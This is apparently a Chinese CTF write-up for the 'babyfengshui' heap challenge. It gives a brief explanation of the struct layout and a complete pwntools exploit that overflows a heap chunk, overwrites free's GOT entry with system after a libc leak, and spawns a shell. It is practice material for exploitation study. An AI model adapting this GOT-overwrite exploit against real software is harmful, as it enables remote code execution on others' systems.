本题主要就是看懂一条判断溢出的if语句
结构体是怎么看出来的
-
代码上看
struct{ char *text; char name[124]; }
-
从内存上看
思路
step4 的关于408哪里来的
- 看内存地址,计算chunk3的content到chunk1的struct即可
exp
from pwn import *
p = remote('node3.buuoj.cn',29853)
#p = process('./babyfengshui_33c3_2016')
context.log_level = 'debug'
elf = ELF('./babyfengshui_33c3_2016')
def add(size,name,length,text):
p.sendlineafter('Action: ',str(0))
p.sendlineafter('size of description: ',str(size))
p.sendlineafter('name: ',name)
p.sendlineafter('text length: ',str(length))
p.sendlineafter('text: ',text)
def free(index):
p.sendlineafter('Action: ',str(1))
p.sendlineafter('index: ',str(index))
def update(index,length,text):
p.sendlineafter('Action: ',str(3))
p.sendlineafter('index: ',str(index))
p.sendlineafter('text length: ',str(length))
p.sendlineafter('text: ',text)
def show(index):
p.sendlineafter('Action: ',str(2))
p.sendlineafter('index: ',str(index))
#step1 创建三个chunk
add(0x80,'huzai',0x78,'aaa')
add(0x80,'huzai',0x78,'ccc')
add(0x80,'huzai',0x78,'/bin/sh\x00')
#step2 free chunk0
free(0)
#step3 新申请一个大的chunk
add(0x100,'hzuai222',0x98,'dddd')
#step4 修改chunk3 的内容,溢出到chunk1 的struct,修改node1的content指针位free_got
update(3,0x200,b'a'*408+p32(elf.got['free']))
#step5 show chunk1泄露free的got地址,计算出libc_base
show(1)
from LibcSearcher import *
p.recvuntil("description: ")
free_addr=u32(p.recv(4))
libc=LibcSearcher("free",free_addr)
libc_base=free_addr-libc.dump("free")
system_addr=libc_base+libc.dump("system")
#step6 修改free_got 为 system,编辑chunk2的content为/bin/sh\x00
update(1,0x4,p32(system_addr))
#step7 释放chunk2
free(2)
p.interactive()